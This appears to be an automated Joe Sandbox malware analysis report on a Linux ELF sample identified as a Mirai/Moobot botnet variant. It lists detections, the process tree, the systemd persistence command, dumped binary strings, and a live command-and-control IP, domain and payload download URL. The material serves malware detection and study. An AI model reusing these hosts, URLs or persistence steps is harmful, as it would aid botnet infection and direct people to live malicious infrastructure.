Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1528134
MD5:8a1de97bd5a302571f7cd7cd23ac8ad6
SHA1:09304aa19c1ff458218098799e844f51e67f671c
SHA256:8e05d02bfd535a557c2691defd2d30b8d7599e952a06247c7e44554fad54c25a
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Detected Mirai
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Moobot
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528134
Start date and time:2024-10-07 16:30:54 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal92.troj.linELF@0/3@31/0
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:5532
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
bolu_botnet_done.
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 5532, Parent: 5454, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 5534, Parent: 5532)
    • na.elf New Fork (PID: 5537, Parent: 5532)
    • sh (PID: 5537, Parent: 5532, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
      • sh New Fork (PID: 5543, Parent: 5537)
      • systemctl (PID: 5543, Parent: 5537, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service
    • na.elf New Fork (PID: 5547, Parent: 5532)
  • systemd New Fork (PID: 5545, Parent: 5544)
  • snapd-env-generator (PID: 5545, Parent: 5544, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    na.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      na.elfJoeSecurity_MoobotYara detected MoobotJoe Security
        SourceRuleDescriptionAuthorStrings
        5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
          5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              Process Memory Space: na.elf PID: 5532JoeSecurity_OkiruYara detected OkiruJoe Security
                Process Memory Space: na.elf PID: 5532JoeSecurity_MoobotYara detected MoobotJoe Security
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-07T16:31:45.189681+020020304901Malware Command and Control Activity Detected192.168.2.154160891.200.103.11723561TCP
                  2024-10-07T16:31:53.036571+020020304901Malware Command and Control Activity Detected192.168.2.154161091.200.103.11723561TCP
                  2024-10-07T16:32:00.705827+020020304901Malware Command and Control Activity Detected192.168.2.154161291.200.103.11723561TCP
                  2024-10-07T16:32:10.330861+020020304901Malware Command and Control Activity Detected192.168.2.154161491.200.103.11723561TCP
                  2024-10-07T16:32:15.987943+020020304901Malware Command and Control Activity Detected192.168.2.154161691.200.103.11723561TCP
                  2024-10-07T16:32:24.610745+020020304901Malware Command and Control Activity Detected192.168.2.154161891.200.103.11723561TCP
                  2024-10-07T16:32:31.298035+020020304901Malware Command and Control Activity Detected192.168.2.154162091.200.103.11723561TCP
                  2024-10-07T16:32:42.946301+020020304901Malware Command and Control Activity Detected192.168.2.154162291.200.103.11723561TCP
                  2024-10-07T16:32:50.890356+020020304901Malware Command and Control Activity Detected192.168.2.154162491.200.103.11723561TCP
                  2024-10-07T16:32:59.891429+020020304901Malware Command and Control Activity Detected192.168.2.154162691.200.103.11723561TCP
                  2024-10-07T16:33:02.550490+020020304901Malware Command and Control Activity Detected192.168.2.154162891.200.103.11723561TCP
                  2024-10-07T16:33:12.194881+020020304901Malware Command and Control Activity Detected192.168.2.154163091.200.103.11723561TCP
                  2024-10-07T16:33:16.817515+020020304901Malware Command and Control Activity Detected192.168.2.154163291.200.103.11723561TCP
                  2024-10-07T16:33:27.443917+020020304901Malware Command and Control Activity Detected192.168.2.154163491.200.103.11723561TCP
                  2024-10-07T16:33:39.091874+020020304901Malware Command and Control Activity Detected192.168.2.154163691.200.103.11723561TCP
                  2024-10-07T16:33:50.745630+020020304901Malware Command and Control Activity Detected192.168.2.154163891.200.103.11723561TCP
                  2024-10-07T16:34:02.369016+020020304901Malware Command and Control Activity Detected192.168.2.154164091.200.103.11723561TCP
                  2024-10-07T16:34:06.661195+020020304901Malware Command and Control Activity Detected192.168.2.154164291.200.103.11723561TCP
                  2024-10-07T16:34:11.338918+020020304901Malware Command and Control Activity Detected192.168.2.154164491.200.103.11723561TCP
                  2024-10-07T16:34:16.859216+020020304901Malware Command and Control Activity Detected192.168.2.154164691.200.103.11723561TCP
                  2024-10-07T16:34:28.107543+020020304901Malware Command and Control Activity Detected192.168.2.154164891.200.103.11723561TCP
                  2024-10-07T16:34:35.957045+020020304901Malware Command and Control Activity Detected192.168.2.154165091.200.103.11723561TCP
                  2024-10-07T16:34:41.757202+020020304901Malware Command and Control Activity Detected192.168.2.154165291.200.103.11723561TCP
                  2024-10-07T16:34:50.505061+020020304901Malware Command and Control Activity Detected192.168.2.154165491.200.103.11723561TCP
                  2024-10-07T16:34:53.266633+020020304901Malware Command and Control Activity Detected192.168.2.154165691.200.103.11723561TCP
                  2024-10-07T16:35:00.092749+020020304901Malware Command and Control Activity Detected192.168.2.154165891.200.103.11723561TCP
                  2024-10-07T16:35:04.809191+020020304901Malware Command and Control Activity Detected192.168.2.154166091.200.103.11723561TCP
                  2024-10-07T16:35:13.498789+020020304901Malware Command and Control Activity Detected192.168.2.154166291.200.103.11723561TCP
                  2024-10-07T16:35:18.279983+020020304901Malware Command and Control Activity Detected192.168.2.154166491.200.103.11723561TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: na.elfReversingLabs: Detection: 52%
                  Source: na.elfString: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc./proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/etc/systemd/system/sbolo.servicew[Unit]

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41608 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41614 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41616 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41610 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41618 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41656 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41620 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41634 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41628 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41622 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41632 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41612 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41630 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41646 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41664 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41644 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41626 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41636 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41624 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41662 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41658 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41652 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41642 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41654 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41648 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41650 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41640 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41638 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41660 -> 91.200.103.117:23561
                  Source: global trafficTCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561
                  Source: global trafficTCP traffic: 192.168.2.15:41608 -> 91.200.103.117:23561
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: yi0key.heleh.com.vn
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: na.elfString found in binary or memory: http://91.200.103.117/%s
                  Source: na.elf, 5532.1.00007f1a6042f000.00007f1a6043a000.rw-.sdmp, sbolo.service.12.drString found in binary or memory: http://91.200.103.117/bolubotnetsh4
                  Source: Initial sampleString containing 'busybox' found: busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc./proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/pow
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: classification engineClassification label: mal92.troj.linELF@0/3@31/0
                  Source: /tmp/na.elf (PID: 5537)Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"Jump to behavior
                  Source: /bin/sh (PID: 5543)Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.serviceJump to behavior
                  Source: /tmp/na.elf (PID: 5532)Queries kernel information via 'uname': Jump to behavior
                  Source: na.elf, 5532.1.00007ffe1c6de000.00007ffe1c6ff000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
                  Source: na.elf, 5532.1.00007ffe1c6de000.00007ffe1c6ff000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
                  Source: na.elf, 5532.1.00005636b26bd000.00005636b2740000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
                  Source: na.elf, 5532.1.00005636b26bd000.00005636b2740000.rw-.sdmpBinary or memory string: 6V5!/etc/qemu-binfmt/sh4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Systemd Service
                  1
                  Systemd Service
                  Direct Volume AccessOS Credential Dumping11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Non-Standard Port
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Scripting
                  Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528134 Sample: na.elf Startdate: 07/10/2024 Architecture: LINUX Score: 92 20 yi0key.heleh.com.vn 91.200.103.117, 23561, 41608, 41610 COMBAHTONcombahtonGmbHDE Germany 2->20 22 daisy.ubuntu.com 2->22 24 Suricata IDS alerts for network traffic 2->24 26 Detected Mirai 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 4 other signatures 2->30 8 na.elf 2->8         started        10 systemd snapd-env-generator 2->10         started        signatures3 process4 process5 12 na.elf sh 8->12         started        14 na.elf 8->14         started        16 na.elf 8->16         started        process6 18 sh systemctl 12->18         started       
                  SourceDetectionScannerLabelLink
                  na.elf53%ReversingLabsLinux.Trojan.Mirai
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.25
                  truefalse
                    unknown
                    yi0key.heleh.com.vn
                    91.200.103.117
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://91.200.103.117/bolubotnetsh4na.elf, 5532.1.00007f1a6042f000.00007f1a6043a000.rw-.sdmp, sbolo.service.12.drfalse
                        unknown
                        http://91.200.103.117/%sna.elffalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          91.200.103.117
                          yi0key.heleh.com.vnGermany
                          30823COMBAHTONcombahtonGmbHDEtrue
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          91.200.103.117na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                            na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                    na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          daisy.ubuntu.comna.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousGafgytBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 162.213.35.24
                                          na.elfGet hashmaliciousGafgytBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 162.213.35.25
                                          yi0key.heleh.com.vnna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          COMBAHTONcombahtonGmbHDEna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                          • 91.200.103.117
                                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
